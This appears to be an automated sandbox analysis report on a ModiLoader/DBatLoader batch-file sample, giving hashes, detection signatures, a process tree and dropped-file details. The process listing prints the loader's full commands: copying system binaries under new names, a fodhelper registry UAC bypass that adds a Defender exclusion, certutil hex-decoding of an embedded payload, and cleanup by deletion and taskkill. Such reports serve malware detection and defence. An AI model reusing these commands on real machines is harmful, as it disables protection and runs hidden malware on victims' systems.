Analysis
-
max time kernel
136s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26-03-2024 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat
Resource
win10v2004-20240226-en
General
-
Target
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat
-
Size
2.9MB
-
MD5
0acc894a421b72f77d8f825865710ec4
-
SHA1
e51bfe768ece4a254a5f85c977fa65dfa963c3b8
-
SHA256
e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e
-
SHA512
4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02
-
SSDEEP
24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/memory/1904-54-0x0000000002EC0000-0x0000000003EC0000-memory.dmp modiloader_stage2 -
Executes dropped EXE 16 IoCs
pid Process 2076 alpha.exe 2604 alpha.exe 2724 alpha.exe 2720 xkn.exe 2972 alpha.exe 2412 alpha.exe 2424 kn.exe 2488 alpha.exe 2532 kn.exe 1904 Lewxa.com 312 alpha.exe 2392 alpha.exe 1956 alpha.exe 2788 alpha.exe 2776 alpha.exe 2936 alpha.exe -
Loads dropped DLL 8 IoCs
pid Process 2872 cmd.exe 2872 cmd.exe 2724 alpha.exe 2720 xkn.exe 2720 xkn.exe 2412 alpha.exe 2696 WerFault.exe 2696 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2696 1904 WerFault.exe 43 -
Kills process with taskkill 2 IoCs
pid Process 2792 taskkill.exe 1984 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2628 reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1904 Lewxa.com -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2720 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2720 xkn.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2036 2872 cmd.exe 29 PID 2872 wrote to memory of 2036 2872 cmd.exe 29 PID 2872 wrote to memory of 2036 2872 cmd.exe 29 PID 2036 wrote to memory of 3004 2036 cmd.exe 30 PID 2036 wrote to memory of 3004 2036 cmd.exe 30 PID 2036 wrote to memory of 3004 2036 cmd.exe 30 PID 2872 wrote to memory of 2076 2872 cmd.exe 31 PID 2872 wrote to memory of 2076 2872 cmd.exe 31 PID 2872 wrote to memory of 2076 2872 cmd.exe 31 PID 2076 wrote to memory of 3020 2076 alpha.exe 32 PID 2076 wrote to memory of 3020 2076 alpha.exe 32 PID 2076 wrote to memory of 3020 2076 alpha.exe 32 PID 2872 wrote to memory of 2604 2872 cmd.exe 33 PID 2872 wrote to memory of 2604 2872 cmd.exe 33 PID 2872 wrote to memory of 2604 2872 cmd.exe 33 PID 2604 wrote to memory of 2636 2604 alpha.exe 34 PID 2604 wrote to memory of 2636 2604 alpha.exe 34 PID 2604 wrote to memory of 2636 2604 alpha.exe 34 PID 2872 wrote to memory of 2724 2872 cmd.exe 35 PID 2872 wrote to memory of 2724 2872 cmd.exe 35 PID 2872 wrote to memory of 2724 2872 cmd.exe 35 PID 2724 wrote to memory of 2720 2724 alpha.exe 36 PID 2724 wrote to memory of 2720 2724 alpha.exe 36 PID 2724 wrote to memory of 2720 2724 alpha.exe 36 PID 2720 wrote to memory of 2972 2720 xkn.exe 37 PID 2720 wrote to memory of 2972 2720 xkn.exe 37 PID 2720 wrote to memory of 2972 2720 xkn.exe 37 PID 2972 wrote to memory of 2628 2972 alpha.exe 38 PID 2972 wrote to memory of 2628 2972 alpha.exe 38 PID 2972 wrote to memory of 2628 2972 alpha.exe 38 PID 2872 wrote to memory of 2412 2872 cmd.exe 39 PID 2872 wrote to memory of 2412 2872 cmd.exe 39 PID 2872 wrote to memory of 2412 2872 cmd.exe 39 PID 2412 wrote to memory of 2424 2412 alpha.exe 40 PID 2412 wrote to memory of 2424 2412 alpha.exe 40 PID 2412 wrote to memory of 2424 2412 alpha.exe 40 PID 2872 wrote to memory of 2488 2872 cmd.exe 41 PID 2872 wrote to memory of 2488 2872 cmd.exe 41 PID 2872 wrote to memory of 2488 2872 cmd.exe 41 PID 2488 wrote to memory of 2532 2488 alpha.exe 42 PID 2488 wrote to memory of 2532 2488 alpha.exe 42 PID 2488 wrote to memory of 2532 2488 alpha.exe 42 PID 2872 wrote to memory of 1904 2872 cmd.exe 43 PID 2872 wrote to memory of 1904 2872 cmd.exe 43 PID 2872 wrote to memory of 1904 2872 cmd.exe 43 PID 2872 wrote to memory of 1904 2872 cmd.exe 43 PID 2872 wrote to memory of 312 2872 cmd.exe 44 PID 2872 wrote to memory of 312 2872 cmd.exe 44 PID 2872 wrote to memory of 312 2872 cmd.exe 44 PID 2872 wrote to memory of 2392 2872 cmd.exe 45 PID 2872 wrote to memory of 2392 2872 cmd.exe 45 PID 2872 wrote to memory of 2392 2872 cmd.exe 45 PID 2872 wrote to memory of 1956 2872 cmd.exe 46 PID 2872 wrote to memory of 1956 2872 cmd.exe 46 PID 2872 wrote to memory of 1956 2872 cmd.exe 46 PID 2872 wrote to memory of 2788 2872 cmd.exe 47 PID 2872 wrote to memory of 2788 2872 cmd.exe 47 PID 2872 wrote to memory of 2788 2872 cmd.exe 47 PID 2872 wrote to memory of 2776 2872 cmd.exe 48 PID 2872 wrote to memory of 2776 2872 cmd.exe 48 PID 2872 wrote to memory of 2776 2872 cmd.exe 48 PID 2776 wrote to memory of 2792 2776 alpha.exe 49 PID 2776 wrote to memory of 2792 2776 alpha.exe 49 PID 2776 wrote to memory of 2792 2776 alpha.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵PID:3004
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵PID:3020
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2636
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
PID:2628
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
PID:2532
-
-
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 7523⤵
- Loads dropped DLL
- Program crash
PID:2696
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
PID:312
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2392
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1956
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2788
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
PID:2936 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
130KB
MD5d74d9148a2533e8fd2c55f7f78d464ad
SHA18a207d8d2ac8e0a6f06cdb38a62af62f16dd97ef
SHA256cfd3ae792012746b73f3173b459e933062c8a04505404fa36365ad735a4eda75
SHA51227f71cb70d268034fedbddef821395a4eacbf082e42d0493db16c179feb719d1da2919aa43eadfaa6e95265c0bbb83050ab9dc80ca5ea15e6adee71eb2c41d2e
-
Filesize
1.0MB
MD5701a1b8de275a64ad562d862d7e117d4
SHA1a6dcd9f802a20fa07bd2f569b0761244ab5803a7
SHA256f5ad3a45f4bea88e28aa2c541ee13ab28fa68a29af572ce2ca02960464d601ad
SHA512085a5becd2c1ceac9a0dfefdc0dc663d598062b2bfef24e3709b0998924f98836eaa0d66bc21dbda9842fead17443fbd3b69febd620639b8e1921d3b0e797a32
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d